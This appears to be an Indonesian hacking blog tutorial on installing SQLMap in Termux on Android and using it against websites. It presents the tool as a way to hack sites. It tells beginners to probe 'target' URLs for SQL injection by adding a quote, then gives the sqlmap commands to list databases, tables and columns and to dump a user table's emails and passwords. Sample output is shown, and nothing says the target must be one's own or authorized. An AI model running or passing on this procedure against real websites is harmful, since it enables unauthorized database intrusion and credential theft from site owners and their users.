Tutorial Install SQLMap dan Cara menggunakannya

Halo sobat STH, di kesempatan kali ini saya sang Author sth akan memberikan Tips Tutorial Install SQLmap dengan Termux serta Cara menggunakannya untuk mencari web yang Vuln, tapi sebelum ke tutorialnya lebih lanjut kita akan bahas terlebih dahulu pengertian dan apa kegunaan dari tools SQLmap ini.

Cara install SQLmap dengan Termux

SQLmap adalah sebuah tools atau alat yang berguna untuk mengeksploitasi SQL atau menginjeksi sebuah website yang memiliki celah pada SQL website tersebut dengan mudah dan praktis, kenapa saya bilang praktis, karena anda tidak perlu repot mensetting nya karena sudah dilakukan secara otomatis oleh tools ini. Dengan menggunakan tools atau alat ini anda dapat dengan mudah mendapatkan sebuah database dari website secara mudah dan cepat. Alat ini sangat ampuh dan dapat digunakan untuk hacking atau meretas website.

Nah itulah beberapa penjelasan singkat dari tools SQLmap, Ok, tanpa basa basi lagi kita langsung saja lompat ke tutorialnya.

Cara Install SQLmap dengan Termux di Android

Langkah pertama silahkan langsung saja Buka aplikasi Termux anda, lalu gunakan perintah update dan upgrade terlebih dahulu agar tidak terjadi error saat menjalankan tools nya. Silahkan gunakan perintah :

pkg update && pkg upgrade

Selanjutnya install git terlebih dahulu dengan menggunakan perintah dibawah ini:

pkg install git

Karena tools SQLmap menggunakan bahasa python2, maka silahkan anda install python2 dengan perintah

pkg install python2

Nah setelah menginstall python2, Selanjutnya kloning script SQLmap menggunakan perintah dibawah ini:

git clone https://github.com/sqlmapproject/sqlmap

Setelah proses kloning atau download Selesai, jika anda ingin menjalankan tool SQLmap ini, anda tinggal masuk folder menu diktori dari SQLmap ini silahkan gunakan perintah

cd sqlmap

Langkah selanjut nya jalankan dengan perintah

python2 sqlmap.py

Selesai, anda sudah berhasil menginstal SQLmap menggunakan Termux di Android anda, sekarang kita lanjut ke Cara menggunakan tools SQLmap ini.

Cara Menggunakan SQLmap menggunakan Termux untuk Pemula

Jika anda telah mendapatkan sebuah target situs untuk anda injeksi dengan SQLmap ini, Misalnya url yang ingin anda masukan seperti berikut ini.

situsanda.com/news.php?id=1

Nah jika anda ingin Memastikan apakah situs yang anda maksud ini vuln dan memiliki celah SQL-I, anda hanya tinggal menambah kan tanda ' dibelakang url di situsnya seperti berikut.

situsanda.com/news.php?id=1

Untuk memastikan situs tersebut vuln, jika kalian menambahkan ' dibelakang url dan munculnya error ataupun blank berarti situs tersebut vuln atau bisa di injeksi oleh SQLmap dan sebaliknya jika tidak, berarti tidak vuln atau memiliki celah SQL.

Nah di sini anda sudah memiliki target situs yang ingin anda masukan apakah vuln atau tidak, anda tinggal menyalin url situs nya terlebih dahulu. Langkah selanjutnya silahkan buka aplikasi Termux anda,  kemudian masuk kedalam direktori tool SQLmap dengan perintah

cd sqlmap

Kemudian Injeksi situs anda tadi dengan menjalankan perintah berikut ini.

python2 sqlmap.py "situsanda.com/news.php?id=1" --dbs

Maka secara Otomatis SQLmap anda mulai menginjeksi situs tersebut, kemudian segera mengambil database dari situs ini, Jika anda telah Berhasil Mendapatkan Database nya maka akan muncul Seperti berikut ini.

available databases [2]: 

[*] information_schema 

[*] situsanda

Langkah selanjutnya jika kalian ingin mengetahui tabel Situsanda dari database tersebut kalian tinggal, anda tinggal menggunakan perintah berikut.

python2 sqlmap.py "situsanda.com/news.php?id=1" --tables -D situsanda

Setelah anda mendapatkan tabel dari database tersebut, misalnya kalian mendapatkan tabel sebagai berikut.

[*] user
[*] admin

Seperti gambar di bawah ini:

Cara menggunakan SQLmap dengan Termux 

Jika anda ingin mengetahui isi tabel, anda tinggal mengetikan perintah dibawah ini.

python2 sqlmap.py "situsanda.com/news.php?id=1" --columns -D namadatabase -T namatabel

Saya beri contoh, di sini saya akan melihat isi tabel user dari database Situsanda, sekarang saya hanya akan menggunakan perintah.

python2 sqlmap.py "situsanda.com/news.php?id=1" --columns -D situsanda -T user

Setelah kalian mendapatkan isi dari tabel, misalnya isi tabel tersebut seperti berikut.

Table: user [8 columns] 

+--------------------+---------------------+
| Column         |        Type        |
+--------------------+---------------------+
| email             | text                 |
| hash              | varchar(128) |
| id                    |    int(11)         |
| name             |    text              |
| passwor        | text                 |
| id                    | tinyint(5)        |
| access           | text                 |
| system_us     | text                 |
+---------------------+---------------------+

Jika anda ingin mengetahui email dan password dari database Situsanda dan tabel usernya tadi, anda hanya tinggal menggunakan perintah.

python2 sqlmap.py "situsanda.com/news.php?id=1" --dump -D situsanda -T user

Selesai, Sekarang anda sudah mendapatkan informasi email dan password dari database tersebut.

Sangat mudah bukan, Ok Sobat itulah tutorial singkat dari saya tentang Cara menggunakan SQLmap menggunakan Termux untuk pemula, sekian Tutorial singkat dari saya sampai jumpa di artikel berikut nya yang akan membahas lebih lanjut tentang Tips dan Tutorial Termux, Terima Kasih.

Bagikan Artikel ini